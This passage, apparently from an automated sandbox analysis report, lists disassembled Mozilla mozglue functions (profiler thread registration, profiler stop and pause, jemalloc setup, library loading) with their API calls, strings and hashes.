                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9420bc0aa32cdd7b0d474505409d15a1a1c50cfc5fed2be34274c580b54314a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1A137317043049FDB409FA8D848B6677B5FFFA308F24442AE91987B51EB31D816CBA5
                                                                                                                                                                                                                                                                                        Function 6C9AF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF70E
                                                                                                                                                                                                                                                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C9AF8F9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C976390: GetCurrentThreadId.KERNEL32 ref: 6C9763D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C976390: AcquireSRWLockExclusive.KERNEL32 ref: 6C9763DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C976390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C97640E
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AF93A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF98A
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF990
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AF994
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AF716
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C96B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C96B5E0
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF739
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AF746
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AF793
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9E385B,00000002,?,?,?,?,?), ref: 6C9AF829
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,00000000,?), ref: 6C9AF84C
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C9AF866
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9AFA0C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9755E1), ref: 6C975E8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C975E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: GetCurrentThreadId.KERNEL32 ref: 6C975EAB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: GetCurrentThreadId.KERNEL32 ref: 6C975EB8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C975ECF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C975F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C975F47
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: GetCurrentProcess.KERNEL32 ref: 6C975F53
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: GetCurrentThread.KERNEL32 ref: 6C975F5C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: GetCurrentProcess.KERNEL32 ref: 6C975F66
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C975E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C975F7E
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9AF9C5
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C9AF9DA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • " attempted to re-register as ", xrefs: 6C9AF858
                                                                                                                                                                                                                                                                                        • [D %d/%d] profiler_register_thread(%s), xrefs: 6C9AF71F
                                                                                                                                                                                                                                                                                        • Thread , xrefs: 6C9AF789
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C9AF9A6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                                                                                                                                                        • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                                                                                                                                                        • API String ID: 882766088-1834255612
                                                                                                                                                                                                                                                                                        • Opcode ID: 82370fd8e5faea506a71c310208b6189c4858e29252bf5bea799bd2d42c8e4c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 716841f7cea8d822341d2fbb1abd3926652e4b4e4eaed9c9ae4b3decc65c3513
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82370fd8e5faea506a71c310208b6189c4858e29252bf5bea799bd2d42c8e4c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D28104716043009FDB11DF64C840BAAB7B5FFE9308F55496DE8499BB51EB30D84ACBA2
                                                                                                                                                                                                                                                                                        Function 6C9AEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C974A68), ref: 6C9A945E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9A9470
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9A9482
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A9420: __Init_thread_footer.LIBCMT ref: 6C9A949F
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEE60
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEE6D
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEE92
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9AEEA5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C9AEEB4
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C9AEEBB
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEEC7
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AEECF
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ADE60: GetCurrentThreadId.KERNEL32 ref: 6C9ADE73
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ADE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C974A68), ref: 6C9ADE7B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ADE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C974A68), ref: 6C9ADEB8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ADE60: free.MOZGLUE(00000000,?,6C974A68), ref: 6C9ADEFE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9ADE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9ADF38
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: GetCurrentProcess.KERNEL32(?,6C9631A7), ref: 6C99CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C99CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9631A7), ref: 6C99CBFA
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEF1E
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEF2B
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEF59
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEFB0
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEFBD
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EF4B8), ref: 6C9AEFE1
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9AEFF8
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9AF000
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9A94EE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9A9508
                                                                                                                                                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C9AF02F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9AF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C9AF09B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9AF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C9AF0AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9AF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C9AF0BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_pause, xrefs: 6C9AF008
                                                                                                                                                                                                                                                                                        • [I %d/%d] profiler_stop, xrefs: 6C9AEED7
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                                                                                        • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                                                                                        • API String ID: 16519850-1833026159
                                                                                                                                                                                                                                                                                        • Opcode ID: e0b5e06fa548aa66f4fe7a080d330313e7f5786b9f3c77c218a307b030f63438
                                                                                                                                                                                                                                                                                        • Instruction ID: 9b5baf518c6750a9e02c39c71052de8548abc123fbef81af768700f4a1109351
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0b5e06fa548aa66f4fe7a080d330313e7f5786b9f3c77c218a307b030f63438
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3651C0316083109FDB416BA4E4087A53BB8EFBE21CF34056AE91583F40EB36C815C7E6
                                                                                                                                                                                                                                                                                        Function 6C99D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EE804), ref: 6C99D047
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C99D093
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C99D0A6
                                                                                                                                                                                                                                                                                        • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C9EE810,00000040), ref: 6C99D0D0
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE7B8,00001388), ref: 6C99D147
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE744,00001388), ref: 6C99D162
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE784,00001388), ref: 6C99D18D
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EE7DC,00001388), ref: 6C99D1B1
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 2957312145-326518326
                                                                                                                                                                                                                                                                                        • Opcode ID: a27895742619cb028cfca6ccb5661c29c44cd89c2acce0ce9484d10a43fd0711
                                                                                                                                                                                                                                                                                        • Instruction ID: b03fdd240988c593e7ca7b8a400660fa53ac528a8f5f3d39aaf2389828ef5093
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a27895742619cb028cfca6ccb5661c29c44cd89c2acce0ce9484d10a43fd0711
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2881D272B08240DBEB549F69C984B6937B9FF7E708F280529E90197B80D772D845CBD2
                                                                                                                                                                                                                                                                                        Function 6C975E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C975E9D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9856EE,?,00000001), ref: 6C985B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: EnterCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: LeaveCriticalSection.KERNEL32(6C9EF688,?,?,?,6C9856EE,?,00000001), ref: 6C985BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985B50: GetTickCount64.KERNEL32 ref: 6C985BE4
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C975EAB
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C975EB8
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C975ECF
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C976017
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964310: moz_xmalloc.MOZGLUE(00000010,?,6C9642D2), ref: 6C96436A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C964310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9642D2), ref: 6C964387
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C975F47
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C975F53
                                                                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C975F5C
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C975F66
                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C975F7E
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C975F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: mozalloc_abort.MOZGLUE(?), ref: 6C97CAA2
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9755E1), ref: 6C975E8C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9755E1), ref: 6C97605D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9755E1), ref: 6C9760CC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                        • String ID: GeckoMain
                                                                                                                                                                                                                                                                                        • API String ID: 3711609982-966795396
                                                                                                                                                                                                                                                                                        • Opcode ID: 8960327e0a59053ca19c450abf1c51b2d3b76c8de828bb830a81ed0ed48bede2
                                                                                                                                                                                                                                                                                        • Instruction ID: 14251ca59e7385bcc935e5c0133e369f5812919bbaf5ad3b65cf56d2c55593da
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8960327e0a59053ca19c450abf1c51b2d3b76c8de828bb830a81ed0ed48bede2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1871F5B0609740DFD750DF25D484A6ABBF0FF6A308F14496EE48687B52D731E948CBA2
                                                                                                                                                                                                                                                                                        Function 6C979590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C963217
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C963236
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: FreeLibrary.KERNEL32 ref: 6C96324B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: __Init_thread_footer.LIBCMT ref: 6C963260
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C96327F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C96328E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9632AB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9632D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9632E5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9631C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9632F7
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C979675
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C979697
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9796E8
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C979707
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C97971F
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C979773
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9797B7
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C9797D0
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C9797EB
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C979824
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                        • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                        • Opcode ID: 595ac8bd3f61f0982340874a5b2509a80a8579773698ea50d2f95b49a51c7c94
                                                                                                                                                                                                                                                                                        • Instruction ID: 2255980e80f02c6529eb37a82f2fe8dcc81a6e115dbf470b60d64625d6b52f61
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 595ac8bd3f61f0982340874a5b2509a80a8579773698ea50d2f95b49a51c7c94
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05610571609305DBDF10CF69E884B9A3BB5FFAEB18F21451AE91583B80D731D844CBA1
